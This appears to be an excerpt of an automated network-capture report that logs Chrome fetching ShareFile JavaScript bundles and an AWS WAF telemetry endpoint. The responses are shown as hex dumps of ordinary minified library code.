                                                                                                                                                                                                                                                                                Data Ascii: urrentRefetchInterval&&(this.refetchIntervalId=setInterval((()=>{(this.options.refetchIntervalInBackground||x.isFocused())&&this.executeFetch()}),this.currentRefetchInterval))}updateTimers(){this.updateStaleTimeout(),this.updateRefetchInterval(this.comput


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                71192.168.2.64979713.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC424OUTGET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 199512
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Fri, 13 Sep 2024 12:33:19 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 07:37:41 GMT
                                                                                                                                                                                                                                                                                ETag: "38596d901c05cdcb1b7db1f4d6d21ba7"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 b6d1611761652d7a383651f2bf480596.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 1sv0EwMZQDIlDB_NRQwmiLH8PvAyaEuFDvn4te4C3MfjJG1lR-iXww==
                                                                                                                                                                                                                                                                                Age: 37656
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 65 6e 74 69 74 6c 65 6d 65 6e 74 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledeventitlementspilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={};return Object.defineProperty(o,"__esModule",{value:!0}),{sett
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 4e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 61 74 61 7d 7d 5d 29 2c 6e 7d 28 6b 29 2c 4d 3d 7b 70 72 6f 63 65 73 73 6f 72 73 3a 7b 7d 2c 61 64 64 50 6f 73 74 50 72 6f 63 65 73 73 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 6f 72 73 5b 65 2e 6e 61 6d 65 5d 3d 65 7d 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 70 72 6f 63 65 73 73 6f 72 73 5b 65 5d 26 26 28 74 3d 69 2e 70 72 6f 63 65 73 73 6f 72 73 5b 65 5d 2e 70 72 6f 63 65 73 73 28 74 2c 6e 2c 72 2c 6f 29 29 7d 29 29 2c 74 7d 7d 3b 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                                Data Ascii: N",value:function(){return this.data}}]),n}(k),M={processors:{},addPostProcessor:function(e){this.processors[e.name]=e},handle:function(e,t,n,r,o){var i=this;return e.forEach((function(e){i.processors[e]&&(t=i.processors[e].process(t,n,r,o))})),t}};functi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 3b 28 30 2c 61 2e 41 29 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 3d 74 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 72 2c 74 68 69 73 2e 6c 6f 67 67 65 72 3d 78 2e 63 72 65 61 74 65 28 22 70 6c 75 72 61 6c 52 65 73 6f 6c 76 65 72 22 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 4a 53 4f 4e 26 26 22 76 34 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 4a 53 4f 4e 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 49 6e 74 6c 26 26 49 6e 74 6c 2e 50 6c 75 72 61 6c 52 75 6c 65 73 7c 7c 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69
                                                                                                                                                                                                                                                                                Data Ascii: undefined?arguments[1]:{};(0,a.A)(this,e),this.languageUtils=t,this.options=r,this.logger=x.create("pluralResolver"),this.options.compatibilityJSON&&"v4"!==this.options.compatibilityJSON||"undefined"!=typeof Intl&&Intl.PluralRules||(this.options.compatibi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC8412INData Raw: 2e 66 61 6c 6c 62 61 63 6b 4e 53 3d 5b 65 2e 66 61 6c 6c 62 61 63 6b 4e 53 5d 29 2c 65 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 26 26 65 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 2e 69 6e 64 65 78 4f 66 28 22 63 69 6d 6f 64 65 22 29 3c 30 26 26 28 65 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 3d 65 2e 73 75 70 70 6f 72 74 65 64 4c 6e 67 73 2e 63 6f 6e 63 61 74 28 5b 22 63 69 6d 6f 64 65 22 5d 29 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 72 3d 72 2e 66
                                                                                                                                                                                                                                                                                Data Ascii: .fallbackNS=[e.fallbackNS]),e.supportedLngs&&e.supportedLngs.indexOf("cimode")<0&&(e.supportedLngs=e.supportedLngs.concat(["cimode"])),e}function de(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.f
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 7b 6b 65 79 3a 22 63 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 69 73 4c 61 6e 67 75 61 67 65 43 68 61 6e 67 69 6e 67 54 6f 3d 65 3b 76 61 72 20 72 3d 4f 28 29 3b 74 68 69 73 2e 65 6d 69 74 28 22 6c 61 6e 67 75 61 67 65 43 68 61 6e 67 69 6e 67 22 2c 65 29 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 6c 61 6e 67 75 61 67 65 3d 65 2c 6e 2e 6c 61 6e 67 75 61 67 65 73 3d 6e 2e 73 65 72 76 69 63 65 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 74 6f 52 65 73 6f 6c 76 65 48 69 65 72 61 72 63 68 79 28 65 29 2c 6e 2e 72 65 73 6f 6c 76 65 64 4c 61 6e 67 75 61 67 65 3d 75 6e 64 65 66 69 6e 65 64 2c 6e 2e 73 65 74 52 65 73 6f 6c 76 65 64
                                                                                                                                                                                                                                                                                Data Ascii: {key:"changeLanguage",value:function(e,t){var n=this;this.isLanguageChangingTo=e;var r=O();this.emit("languageChanging",e);var o=function(e){n.language=e,n.languages=n.services.languageUtils.toResolveHierarchy(e),n.resolvedLanguage=undefined,n.setResolved
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 2c 72 2e 43 67 29 28 74 2c 32 35 35 29 2c 6e 3d 28 30 2c 72 2e 43 67 29 28 6e 2c 32 35 35 29 3b 76 61 72 20 6f 3d 4d 61 74 68 2e 6d 61 78 28 65 2c 74 2c 6e 29 2c 69 3d 4d 61 74 68 2e 6d 69 6e 28 65 2c 74 2c 6e 29 2c 61 3d 30 2c 73 3d 30 2c 75 3d 28 6f 2b 69 29 2f 32 3b 69 66 28 6f 3d 3d 3d 69 29 73 3d 30 2c 61 3d 30 3b 65 6c 73 65 7b 76 61 72 20 63 3d 6f 2d 69 3b 73 77 69 74 63 68 28 73 3d 75 3e 2e 35 3f 63 2f 28 32 2d 6f 2d 69 29 3a 63 2f 28 6f 2b 69 29 2c 6f 29 7b 63 61 73 65 20 65 3a 61 3d 28 74 2d 6e 29 2f 63 2b 28 74 3c 6e 3f 36 3a 30 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 74 3a 61 3d 28 6e 2d 65 29 2f 63 2b 32 3b 62 72 65 61 6b 3b 63 61 73 65 20 6e 3a 61 3d 28 65 2d 74 29 2f 63 2b 34 7d 61 2f 3d 36 7d 72 65 74 75 72 6e 7b 68 3a 61 2c 73 2c 6c 3a 75
                                                                                                                                                                                                                                                                                Data Ascii: ,r.Cg)(t,255),n=(0,r.Cg)(n,255);var o=Math.max(e,t,n),i=Math.min(e,t,n),a=0,s=0,u=(o+i)/2;if(o===i)s=0,a=0;else{var c=o-i;switch(s=u>.5?c/(2-o-i):c/(o+i),o){case e:a=(t-n)/c+(t<n?6:0);break;case t:a=(n-e)/c+2;break;case n:a=(e-t)/c+4}a/=6}return{h:a,s,l:u
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 75 72 6e 20 72 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 26 26 72 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 74 29 3f 72 2e 6d 65 72 67 65 28 65 2c 74 29 3a 72 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 74 29 3f 72 2e 6d 65 72 67 65 28 7b 7d 2c 74 29 3a 72 2e 69 73 41 72 72 61 79 28 74 29 3f 74 2e 73 6c 69 63 65 28 29 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 29 7b 72 65 74 75 72 6e 20 72 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 74 5b 6e 5d 29 3f 72 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 65 5b 6e 5d 29 3f 76 6f 69 64 20 30 3a 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 5b 6e 5d 29 3a 6f 28 65 5b 6e 5d 2c 74 5b 6e 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 69 66 28 21 72 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 74 5b 65 5d 29 29 72 65 74 75
                                                                                                                                                                                                                                                                                Data Ascii: urn r.isPlainObject(e)&&r.isPlainObject(t)?r.merge(e,t):r.isPlainObject(t)?r.merge({},t):r.isArray(t)?t.slice():t}function i(n){return r.isUndefined(t[n])?r.isUndefined(e[n])?void 0:o(undefined,e[n]):o(e[n],t[n])}function a(e){if(!r.isUndefined(t[e]))retu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC8412INData Raw: 65 3d 31 29 2c 21 6e 2e 79 2e 6d 65 74 61 7c 7c 21 6e 2e 79 2e 6d 65 74 61 2e 75 72 6c 29 74 68 72 6f 77 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 5f 5f 73 79 73 74 65 6d 5f 63 6f 6e 74 65 78 74 5f 5f 22 2c 6e 2e 79 29 2c 45 72 72 6f 72 28 22 73 79 73 74 65 6d 6a 73 2d 77 65 62 70 61 63 6b 2d 69 6e 74 65 72 6f 70 20 77 61 73 20 70 72 6f 76 69 64 65 64 20 61 6e 20 75 6e 6b 6e 6f 77 6e 20 53 79 73 74 65 6d 4a 53 20 63 6f 6e 74 65 78 74 2e 20 45 78 70 65 63 74 65 64 20 63 6f 6e 74 65 78 74 2e 6d 65 74 61 2e 75 72 6c 2c 20 62 75 74 20 6e 6f 6e 65 20 77 61 73 20 70 72 6f 76 69 64 65 64 22 29 3b 6e 2e 70 3d 72 28 6e 2e 79 2e 6d 65 74 61 2e 75 72 6c 2c 65 29 7d 7d 2c 33 35 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b
                                                                                                                                                                                                                                                                                Data Ascii: e=1),!n.y.meta||!n.y.meta.url)throw console.error("__system_context__",n.y),Error("systemjs-webpack-interop was provided an unknown SystemJS context. Expected context.meta.url, but none was provided");n.p=r(n.y.meta.url,e)}},358:(e,t,n)=>{function r(e,t){
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 6e 69 6b 6f 6c 61 65 76 20 6f 64 20 6f 64 65 73 73 61 20 6f 72 67 20 70 6c 20 70 6f 6c 74 61 76 61 20 70 70 20 72 6f 76 6e 6f 20 72 76 20 73 65 62 61 73 74 6f 70 6f 6c 20 73 75 6d 79 20 74 65 20 74 65 72 6e 6f 70 69 6c 20 75 7a 68 67 6f 72 6f 64 20 76 69 6e 6e 69 63 61 20 76 6e 20 7a 61 70 6f 72 69 7a 68 7a 68 65 20 7a 68 69 74 6f 6d 69 72 20 7a 70 20 7a 74 20 22 2c 75 67 3a 22 20 61 63 20 63 6f 20 67 6f 20 6e 65 20 6f 72 20 6f 72 67 20 73 63 20 22 2c 75 6b 3a 22 20 61 63 20 62 6c 20 62 72 69 74 69 73 68 2d 6c 69 62 72 61 72 79 20 63 6f 20 63 79 6d 20 67 6f 76 20 67 6f 76 74 20 69 63 6e 65 74 20 6a 65 74 20 6c 65 61 20 6c 74 64 20 6d 65 20 6d 69 6c 20 6d 6f 64 20 6e 61 74 69 6f 6e 61 6c 2d 6c 69 62 72 61 72 79 2d 73 63 6f 74 6c 61 6e 64 20 6e 65 6c 20 6e
                                                                                                                                                                                                                                                                                Data Ascii: nikolaev od odessa org pl poltava pp rovno rv sebastopol sumy te ternopil uzhgorod vinnica vn zaporizhzhe zhitomir zp zt ",ug:" ac co go ne or org sc ",uk:" ac bl british-library co cym gov govt icnet jet lea ltd me mil mod national-library-scotland nel n
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 26 26 6e 2e 6c 65 6e 67 74 68 3f 22 23 22 2b 6e 3a 6e 7d 2c 61 2e 70 61 74 68 6e 61 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 21 30 3d 3d 3d 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 70 61 72 74 73 2e 70 61 74 68 7c 7c 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 3f 22 2f 22 3a 22 22 29 3b 72 65 74 75 72 6e 20 65 3f 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 75 72 6e 3f 69 2e 64 65 63 6f 64 65 55 72 6e 50 61 74 68 3a 69 2e 64 65 63 6f 64 65 50 61 74 68 29 28 6e 29 3a 6e 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 70 61 72 74 73 2e 75 72 6e 3f 74 68 69 73 2e 5f 70 61 72 74 73 2e 70 61 74 68 3d 65 3f 69 2e 72 65 63 6f 64 65 55 72 6e 50 61 74 68 28 65 29 3a 22 22 3a 74 68 69 73 2e
                                                                                                                                                                                                                                                                                Data Ascii: &&n.length?"#"+n:n},a.pathname=function(e,t){if(e===undefined||!0===e){var n=this._parts.path||(this._parts.hostname?"/":"");return e?(this._parts.urn?i.decodeUrnPath:i.decodePath)(n):n}return this._parts.urn?this._parts.path=e?i.recodeUrnPath(e):"":this.


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                72192.168.2.64979618.173.205.424432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC407OUTGET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1
                                                                                                                                                                                                                                                                                Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC449INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:16 GMT
                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                expires: 0
                                                                                                                                                                                                                                                                                x-amzn-waf-challenge-id: Root=1-6706c5dc-6d7a52a512420f2050746504
                                                                                                                                                                                                                                                                                allow: POST
                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 8576ee57c8a84a61190d4c1b31b69a90.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA56-P12
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: nqL9s79TOVucbNJ9lQZKS4JlIiuz3BeXYFskwk2Vd0FOkyFVNJIDtw==


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                73192.168.2.64979813.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC603OUTGET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 650980
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 22 Aug 2024 14:51:30 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 07:37:41 GMT
                                                                                                                                                                                                                                                                                ETag: "d46761310b3c627cc468f3b845e55eca"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 42b60ee17f7593fff72ca1cb725d6c9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: m0VfYz28TWlpAsHVcGWmuiN49r2T24VDFwbwyRoozSXTLFrcdvJIWQ==
                                                                                                                                                                                                                                                                                Age: 37656
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 69 6e 74 65 67 72 61 74 69 6f 6e 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 73
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevintegrationspilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.s
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 7b 72 65 74 75 72 6e 20 73 2e 65 78 65 63 75 74 65 54 6f 6b 65 6e 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 57 69 74 68 43 6f 64 65 28 6c 2c 75 5b 32 5d 2c 65 2c 6f 29 7d 29 29 5b 22 63 61 74 63 68 22 5d 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 64 65 6c 65 74 65 20 65 2e 70 65 6e 64 69 6e 67 46 6f 72 6d 73 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2c 61 28 74 29 7d 29 29 2c 21 30 29 3a 28 64 2e 61 64 64 51 75 65 72 79 28 7b 72 65 64 69 72 65 63 74 5f 75 72 6c 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 2c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 64 2e 68 72 65 66 28 29 29 2c 21 30 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 75 74 68 65 6e 74 69 63 61 74 65 57 69 74 68 54 6f 6b
                                                                                                                                                                                                                                                                                Data Ascii: {return s.executeTokenAuthenticationWithCode(l,u[2],e,o)}))["catch"]((function(t){delete e.pendingFormsAuthentication,a(t)})),!0):(d.addQuery({redirect_url:window.location.toString()}),window.location.replace(d.href()),!0)},e.prototype.authenticateWithTok
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC16384INData Raw: 61 6d 65 3a 22 58 53 52 46 2d 54 4f 4b 45 4e 22 2c 78 73 72 66 48 65 61 64 65 72 4e 61 6d 65 3a 22 58 2d 58 53 52 46 2d 54 4f 4b 45 4e 22 2c 6d 61 78 43 6f 6e 74 65 6e 74 4c 65 6e 67 74 68 3a 2d 31 2c 6d 61 78 42 6f 64 79 4c 65 6e 67 74 68 3a 2d 31 2c 65 6e 76 3a 7b 46 6f 72 6d 44 61 74 61 3a 6e 28 38 31 30 29 7d 2c 76 61 6c 69 64 61 74 65 53 74 61 74 75 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 3d 32 30 30 26 26 65 3c 33 30 30 7d 2c 68 65 61 64 65 72 73 3a 7b 63 6f 6d 6d 6f 6e 3a 7b 41 63 63 65 70 74 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 2c 20 74 65 78 74 2f 70 6c 61 69 6e 2c 20 2a 2f 2a 22 7d 7d 7d 3b 6f 2e 66 6f 72 45 61 63 68 28 5b 22 64 65 6c 65 74 65 22 2c 22 67 65 74 22 2c 22 68 65 61 64 22 5d 2c 28 66 75
                                                                                                                                                                                                                                                                                Data Ascii: ame:"XSRF-TOKEN",xsrfHeaderName:"X-XSRF-TOKEN",maxContentLength:-1,maxBodyLength:-1,env:{FormData:n(810)},validateStatus:function(e){return e>=200&&e<300},headers:{common:{Accept:"application/json, text/plain, */*"}}};o.forEach(["delete","get","head"],(fu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:16 UTC15838INData Raw: 28 74 29 3b 76 61 72 20 73 3d 6b 28 74 68 69 73 2e 64 61 74 61 2c 61 29 7c 7c 7b 7d 3b 72 3f 43 28 73 2c 6e 2c 6f 29 3a 73 3d 52 28 52 28 7b 7d 2c 73 29 2c 6e 29 2c 49 28 74 68 69 73 2e 64 61 74 61 2c 61 2c 73 29 2c 69 2e 73 69 6c 65 6e 74 7c 7c 74 68 69 73 2e 65 6d 69 74 28 22 61 64 64 65 64 22 2c 65 2c 74 2c 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 72 65 6d 6f 76 65 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 2e 68 61 73 52 65 73 6f 75 72 63 65 42 75 6e 64 6c 65 28 65 2c 74 29 26 26 64 65 6c 65 74 65 20 74 68 69 73 2e 64 61 74 61 5b 65 5d 5b 74 5d 2c 74 68 69 73 2e 72 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 73 28 74 29 2c 74 68 69 73 2e 65 6d 69 74 28 22 72 65 6d 6f 76 65 64 22 2c 65
